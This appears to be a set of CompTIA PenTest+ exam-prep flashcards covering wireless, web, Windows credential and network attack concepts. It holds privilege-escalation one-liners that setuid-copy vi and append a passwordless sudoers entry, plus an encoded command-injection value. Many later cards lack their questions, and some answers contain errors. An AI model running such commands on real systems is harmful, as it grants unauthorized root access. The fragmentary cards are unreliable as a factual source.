D.You should not use Reaver to recover the WPS PIN when you can recover the PSK as it is trivial to recover the plaintext value of the PSK using the four way handshake and a simple dictionary

Answer

A

A.If you can recover the WPS PIN, the router will give you the plaintext value of the PSK. If the PSK is a strong password, it may take a while to crack offline

Explanation:
Reaver attacks a WPS implementation weakness in the registrar functionality, where it only takes 11,000 attempts to guess the correct WPS pin.

Attacking WPS to get the PIN can help speed up the process of recovering the plaintext value of the PSK.

In the event the router is not susceptible to a WPS PIN attack, an attack to recover the 4-way handshake may be warranted

B is incorrect because Reaver does not support features to recover the four-way handshake during the wireless authentication process

C is incorrect because Reaver does not support offline attack capabilities to recover plaintext value of the PSK

D is incorrect because the PSK can be of any length and difficult to cracking using just a simple dictionary

Recovering the plaintext value of the PSK may require additional time and computing resources

Question 54

Q

Directory indexing attacks can exploit which feature of a web server?
A.Listing files and other objects within the current directory
B.Authentication bypass
C.Weak access controls
D.None of the above

Answer

A

A.Listing files and other objects within the current directory

Explanation:
Directory indexing (directory browsing) is similar to an ls command in Unix or dir command in Windows

With directory browsing enabled on the web server and a lack of access controls, an attacker would not have to rely on brute force methods to derive web pages and/or subdirectories as they would be exposed from the within the current directory

B is incorrect because authentication bypass is a different type of attack, and would only be possible if the web server or application on the server was vulnerable to that type of attack

C is incorrect because simply being able to list the contents of a web directory remotely does not mean the server has weak access controls.,.

Question 55

Q

In which scenario(s) can DLL hijacking occur? (Choose all that apply)
A.The attacker has write access to a location or path of a missing DLL that is called during program execution
B.The attacker can create a DLL that is missing during program execution and successfully escalate privileges to SYSTEM
C.The attacker removes DLLs used by the OS in c:/Windows/system32
D.The attacker has read access to the DLL search path for the Windows target

Answer

A

A.The attacker has write access to a location or path of a missing DLL that is called during program execution
B.The attacker can create a DLL that is missing during program execution and successfully escalate privileges to SYSTEM

Explanation:
A is correct because write access is required for the location where a DLL should be located, otherwise the attacker will not be able to copy over the malicious DLL to be used in the DLL hijacking attack

B is correct because the attacker has write accewss to the location of where the DLL should reside, and can replace the missing DLL with a malicious one to escalate privileges on the sysyem

C is incorrect because removing the DLL from the System32 directory can cause a DoS and prevent applications from functioning which would be the opposite of exploiting a privileged escalation vulnerability using a running program

D is incorrect because write access is required so the malicious DLL used to escalate privileges can be copied to the appropriate DLL path

Question 56

Q

Which type of social engineering attack can assist an attacker with compromising login credentials or other sensitive information when in close, physical proximity to a victim while he or she is actively working at a computer?
A.Shoulder surfing
B.Baiting
C.Whaling
D.Pretexting

Answer

A

A.Shoulder surfing

Explanation:
Shoulder surfing is an observation technique where an attacker pretends to do something else while instead observing what a target is doing, such as typing in a password

Question 57

Q

Which of the following are common methods used to accomplish VLAN hopping on a switched networks? (choose all that apply)
A.Double tagging
B.DNS spoofing
C.NAC
D.Switch spoofing

Answer

A

A.Double tagging
D.Switch spoofing

Explanation:
A is correct because double tagging is a result of a switch port being configured to use native VLANs, where an attacker can craft a packet and preprend a false VLAN tag along with its native VLANs

The native VLANs tag (VLAN1) is not forwarded since its the native VLAN, but the false VLAN tag is forwarded to the next switch and sent to the target host as if it originated from the targets native VLAN

Question 58

Q

The HTTPOnly attribute that can accompany a Set-Cookie response header is responsible for which of the following
A.Setting the Secure flag to only allow for SSL connectors
B.Preventing the cookie from being accessed via JavaScript
C.Defining the domain where the cookie is valid
D.Defining the URL where the cookie is valid

Answer

A

B.Preventing the cookie from being accessed via JavaScript

Explanation:
The HTTPOnly attribute will prevent a user (or attacker) from accessing the cookie value from a JavaScript request such as through JavaScripts Document cookie API

A is incorrect because the Secure flag is an attribute by itself in the Set-Cookie header to ensure that the cookie never makes it way over a non-encrypted connection, like HTTP

C is incorrect because the Domain attribute in the Set-Cookie header is used to define the domain where the cookie is valid

D is incorrect because the Path attribute in the Set-Cookie header is used to define the URL where the cookie is valid

Question 59

Q

Which of the following can assist you with brute-forcing a web application login page? (Choose all that apply)
A.Wordlist
B.CeWL
C.Hydra
D.XSS
E.CSRF

Answer

A

A.Wordlist
B.CeWL
C.Hydra

Explanation:
A is correct because a wordlist will provide login password possibilities based on a dictionary of words and commonly used passwords

B is correct because CeWL is a tool used to scrape web pages to derive a wordlist with which to target specific organizations

C is correct because Hydra is a tool used to help automate the login process, which can allow the pentester to make the most efficient use of their time

XSS and CSRF are incorrect but they can assist in capturing login credentials, user session data and senstive information or malicious action, but neither technique will help brute force login a web page

Question 60

Q

During a web vulnerability assessment, you use the sequencer feature in Burp Suite to evaluate the web applications ability to generate secure session tokens.

Why should session tokens that are used for authentication be randomized? (Select all that apply)
A.To protect against predictable session tokens
B.To prevent session-hijacking attacks
C.To prevent forced browsing attacks
D.To defend against clickjacking attacks

Answer

A

A.To protect against predictable session tokens
B.To prevent session-hijacking attacks

Explanation:
A is correct because the lack of randomness with session tokens will make an attackers life easy when attempting to recover an existing, valid session with the web application

B is correct because if the session token can be predict, it can be replayed and the identity of the user would be compromised

C is incorrect because forced browsing is a result of the web application.servers authentication scheme being inconsistent and would allow for an unauthenticated user to access portion of a restricted web site/application due to local of access controls

D is incorrect because sessions tokens do not defend against clickjacking attacks

Question 61

Q

The customer uses unattended installation files to automate configuration of both physical and virtual hosts on the network.

The remote file share that contains the unattended installation files is writable by everyone on the network.

What mitigation would you recommend to the customer to help secure their network?
A.Lock access to share down based on domain access
B.Restrict access based on IP address
C.Discontinue using unattended installation
D.Restrict write access to only trusted hosts

Answer

A

A.Lock access to share down based on domain access
B.Restrict access based on IP address
D.Restrict write access to only trusted hosts

Explanation:
They enforce an access control to restrict who or what can access the unattended installation file share

Question 62

Q

In Microsoft Windows, the \_\_\_\_\_ is used to store credentials in memory after a user successfully logs in to a system
A.Wdigest
B.Kerberos
C.LSASS
D.SAM

Answer

A

C.LSASS

Explanation:
The Local Security Authority Subsystem Service (LSASS) is used to store credentials in memory after a user successfully logs into a system.

The credentials may be an NT LAN MANAGER (NTLM) password hash, LM password hash, or even a cleartexr password.

This helps credential sharing between trusted applications efficient and not require the user to enter a usrname and password every time authentication is required.

Question 63

Q

You are writing the executive summary for your teams pentest report.

You would like to include some findings for senior management.

What is the BEST way of addresses these types of findings?
A.High-level critical findings
B.Impactful low-level details
C.All findings a high level
D.All findings should be addressed and included in executive summary

Answer

A

A.High-level critical findings

Explanation:
The executive summary will include the high level findings for the pentest report, as senior management does not have the patience nor the technical knowledge to fully appreciate the gory details of the assessment in full

Question 64

Q

Your team wants to inject packets onto the network by spoofing legitimate hosts using TCP-based services.

Why might this be a difficult task to complete?
A.Predicting the TCP sequence number would be difficult
B.It is easier to spoof legitimate UDP service
C.TCP is an unreliable protocol, which makes it difficult to spoof
D.TCP-based services can be protected behind a host-based firewall

Answer

A

A.Predicting the TCP sequence number would be difficult

Explanation:
Spoofing legitimate hosts using TCP-based sequence services is difficult, as the TCP sequence number is difficult to predict.

These sequence numbers are exchanged numbers and are exchanged between hosts while communicating over the network

Answer 65

A

C.SOCKS5

Explanation:
A SOCKS5 proxy will allow you to use both TCP and UDP protocols.

All versions of SOCKS server allow for TCP connectivity, but only version 5 supports the ability to relay UDP packets to remote hosts over the SOCKS connection and receive UDP responses through the Proxy server

Answer 66

A

A.The HTTP server is configured to allow anyone to access, what looks to be, a sensitive part of the web server, which warrants further discussion with the customer

Explanation:
The sensitive directory is open and exposed and allows access from anywhere.

This is a concern as unauthorized individuals may have access to sensitive data in that location

Answer 67

A

C.ldapsearch

Answer 68

A

D.All the above

Answer 69

A

A.Since the header is not defined, the user could potentially be susceptible to a reflected XSS attack within the web browser.

Explanation:
A is correct. The X-XSS-Protection response header is used by various web browsers (such as Internet Explorer, Chrome, and Safari) to prevent malicious pages from loading when a reflected cross-site scripting (XSS) attack is detected.

B, C, and D are incorrect. B is incorrect because this is a client-side attack, not a server-side attack. C is incorrect because the attack vector would be through cross-site scripting (XSS), not cross-site request forgery (CSRF). D is incorrect because there is another web server header to help control those types of attacks, such as the X-Frame-Options header.

Answer 70

A

A.Debrief

Explanation:
The debrief (or outbrief) is a post-engagement activity that the customer may ask for in order to gain a better understanding of the attack paths taken by the pentester or pentest team and to share the pentester’s experiences with more of their support staff.

B, C, and D are incorrect. B is incorrect because the executive summary is a section of the pentest report that documents the pentest activities and high-impact findings in a format that executive leadership, with little to no technical knowledge, can comprehend. C is incorrect because the pentest happens prior to the post-engagement activities. D is incorrect because the testing narrative is a writing style or practice that is applied to the pentest report to help articulate the story of how the pentest was conducted and what findings were identified along the way.

Answer 71

A

C. Ping scan

Explanation:
The ping scan uses the Internet Control Message Protocol (ICMP) to determine the status of a host over the network.

A, B, and D are incorrect. A and B are incorrect because the purpose of communication is to test the hosts’ status by communicating with them over the network using ICMP, not to evaluate the state of a TCP port. D is incorrect because one of the answers (ping scan) is correct.

Answer 72

A

A.The target host is sending a RST to the kali host.

Explanation:
In the results of the tcpdump output in this scenario, the [R] flag is a RST (reset) flag, informing the kali host to close the connection, as there is either nothing listening on that port or the service on the other end has requested that the connection be terminated.

B, C, and D are incorrect. B is incorrect because the SYN flag is represented in the tcpdump output as [S], not as [R]. C and D are incorrect because the kali host is attempting to connect to the host over multiple ports using a [S] (SYN) flag, and based on the direction (>) of the communication, the [R] (RST) is originating from the target host, not the kali host.

Answer 73

A

D.System-hardening guidance

Explanation:
The Center for Internet Security (CIS) provides security benchmarks that offer system-hardening guidance for various operating systems, applications, and technologies.

A, B, and C are incorrect. A is incorrect because risk and remediation are determined after a security evaluation of a customer’s network that takes into account different environmental behaviors and various influences that are not available through the CIS benchmarks. B is incorrect because pentest report formats are not provided through the CIS benchmarks; however, PCI, FedRAMP, and PTES offer guidance for pentesters on how to lay out the pentest report. C is incorrect because the common vulnerabilities and exposures (CVEs) are maintained by Mitre, not the CIS benchmarks.

Answer 74

A

A.%66%69%72%73%74%3b%77%68%6f%61%6d%69

Explanation:
A is correct. URL encoding helps replace potentially harmful ASCII values with a % and two hexadecimal digits.

B, C, and D are incorrect. B is incorrect because it is an HTML-encoded format of the parameter value. C is incorrect because it is a base64-encoded representation of the parameter. D is incorrect because the ASCII HEX is the value of the parameter.

Answer 75

A

A.Sanitize and validate user-supplied input.

Explanation:
A is correct. Command injection occurs when a user or process enters system-level commands in a user-supplied input field, such as a URL parameter in an HTTP POST request that executes against the application’s underlying operating system when the input is not validated.

B, C and D are incorrect. B is incorrect because a customer error page is used to report on an exception, not catch the exception, such as in the case of user-input validation. That part requires additional programming logic to decipher what is and is not appropriate to be processed by the application. C is incorrect because the vulnerability is within the application, not the operating system. D is incorrect because a firewall can help limit the attack surface but not remediate the actual vulnerability.

Answer 76

A

B.Syntax Error Exception

Explanation:
B is correct. The SyntaxError exception is used in Python to catch parsing errors in the input, such as when using the following characters in the sample program: $%^&*. When the program reads the user-supplied input, Python will catch the error and, because there is a handler for this type of exception, the print statement will print “Syntax Error Exception” and continue on in the loop and allow the user to try to enter in the correct input, which is a valid number/integer. If there was not a handler written in the program, Python would terminate the program upon receiving the invalid syntax input and print the built-in syntax error message.

A, C, and D are incorrect. A is incorrect because the NameError exception is when an unrecognized local or global name is referenced. C is incorrect because that exception would not catch any errors, as the other two exceptions cover all invalid characters that could be entered. D is incorrect because it is the KeyboardInterrupt exception, which can be executed using the CTRL-Z keyboard sequence.

Answer 77

A

A.Describes the unique MAC address of the access point

Explanation:
The Basic Service Set Identifier (BSSID) is used to describe the unique MAC address of the access point. This provides network clarity when multiple access points are on the same wireless local area network (WLAN) broadcasting the same SSID.

B, C, and D are incorrect. B is incorrect because the Service Set Identifier (SSID) is the name given to the wireless network. C is incorrect because the distribution system (DS) is used to connect multiple access points on the network. D is incorrect because the MAC describes the wireless client (or station) on the network.

Answer 78

A

C.NTLM

Explanation;
C is correct. The NTLM hash is stored in the Security Account Manager (SAM) database on the local computer, or the NTDS.dit database on the Domain Controller. An NT or NTLM hash can be used for remote authentication, which is permitted with relay or pass the hash (PtH) methods of attack.

A, B, and D are incorrect. A and B are incorrect because MD5 and SHA256 are not typically used in PtH attacks. D is incorrect because NTLMv2 hashes (or sometimes referred to as Net-NTLMv2), which are used for network authentication and are based on a user’s NTLM hash and derived from a challenge/response algorithm, cannot be replayed over the network.

Answer 79

A

A.MS06-040
B.MS08-067

Explanation:
A and B are correct. MS06-040 and MS08-067 document an unauthenticated vulnerability in older Microsoft operating systems, like XP SP1, that can be exploited remotely to execute arbitrary code with SYSTEM privileges.

C and D are incorrect. C is incorrect because the MS10-092 documents a vulnerability with the Windows Task Scheduler that allows for local privilege escalation. D is incorrect because MS10-087 documents a vulnerability in Microsoft Office that is remotely exploitable but would only provide user-level privileges.

Answer 80

A

A.Deauthentication attack

Explanation:
A deauthentication attack will force the wireless client to deauthenticate from the WPA2 wireless network, and when the client reestablishes the connection with the access point, you will be able to capture the handshake.

B, C, and D are incorrect. B is incorrect because Wi-Fi jamming (or RF jamming) is an illegal technique used to block radio frequencies originating from legitimate devices that rely on RF, such as equipment found in hospitals. C is incorrect because downgrade attacks are used to target weak encryption protocols or ciphers for man-in-the-middle attacks. D is incorrect because repeating is used to extend a wireless network for clients outside the range of a wireless access point.

Answer 81

A

B.An aggressive timing template used by nmap to enhance the speed of the scan, and is not concerned with accuracy.

Explanation:
The nmap –T flag is a timing template that simplifies the process of telling the port scanner how efficient or effective you want the scan to be. Rather than the tester determine the timing values manually with other performance options, nmap will determine them based on the template used in the scan syntax. –T <0> or <1> is used to be sneaky and evade IDS, while –T <2> is used to conserve bandwidth, -T <3> is the default scan template used when no option is specified, -T <4> is the aggressive scan template, and –T <5> is the insane template. Both <4> and <5> should only be used when network bandwidth is not limited.

A, C, and D are incorrect. When the -T flag is used, Nmap will determine the timing for you. The number <0-5> passed after the –T flag will determine the template to use, and does not represent the number of seconds to execute the scan for. –T <2> is used to conserve network bandwidth, and the –T <0-1> templates are used to be sneaky and evade IDS.

Answer 82

A

C.SELECT

Explanation:
The SELECT statement is used to retrieve a record from the database.

A, B, and D are incorrect. A is incorrect because the DELETE statement is used to remove a record from the database. B is incorrect because the INSERT statement is used to create a new instance of a record in the database. D is incorrect because the UPDATE statement is used to update an existing record in the database.

Answer 83

A

B.The ldapsrv host starts a listener on port 443, and the kali host connects to the bind shell.

Explanation:
B is correct. A bind shell will open a socket on the target host and listen for remote connections. When a network connection is made to the appropriate port, the victim will serve up an interactive operating system shell. In this example, the netcat command was executed from the ldapsrv host to start a TCP listener on port 443. When the kali host connected to port 443, the –e flag executed the /bin/sh command, providing an interactive shell to the root user on the kali host. This type of shell is useful when there is no firewall, or the port you would like to use is permitted through the firewall.

A, C, and D are incorrect because the example uses a bind shell for the connection, not a reverse shell.

Answer 84

A

D.The report should be disposed of after the customer confirms receipt of the pentest report, based on agreed-upon terms in the RoE.

Explanation: Once the customer has provided confirmation of successfully receiving and extracting the report, all remaining digital or written copies of the report should be marked for proper disposal and deletion, based on agreed-upon methods outlined in the rules of engagement (RoE).

A, B, and C are incorrect. A is incorrect because the pentest report should be removed based on the disposal requirements defined by the customer. B is incorrect because once the customer confirms receipt of the pentest report, it can be deleted; however, the RoE can also define when the report should be properly disposed of. C is incorrect because the debrief is a post-engagement activity that happens after the customer has acknowledged receipt of the pentest report and has had time to digest its content. They can then request a debrief (or “outbrief”), if necessary.

Answer 85

A

B.os.system(‘cp /bin/vi /share; chmod 4777/share/vi’)
D.os.system(‘echo “user1 ALL=(ALL) NOPASSWD:ALL”&raquo_space; /etc/sudoers’)

Explanation:
B and D are correct. B is correct because you can use a system call to copy the vi command (as root) to the NFS share and apply a setuid bit on the executable. When the new vi command is executed, you can escape the shell and execute commands as root. D is correct because you can echo a line into the /etc/sudoers file so that your user account can execute commands as root with no password.

A and C are incorrect. A is incorrect because bash has setuid restrictions that will prevent the shell from executing with root privileges. C is incorrect because reading the /etc/shadow file will happen inside root’s cronjob process, thus it will not be visible to your user account. However, if you redirected the output of the command to a file, you would be able to read the shadow file.

Answer 86

A

B.502/tcp

Explanation:
Modbus is a common Supervisory Control and Data Acquisition (SCADA) protocol that operates on port 502/tcp

Answer 87

A

A.Eliminates false positive
C.Configuration Auditing
D.Policy and compliance auditing

Explanation:
you get it

Brainscape's Knowledge GenomeTM

TotalTester Online: CompTIA Pen Test+ Certification Exam PTO-001 Flashcards

Brainscape's Knowledge Genome^TM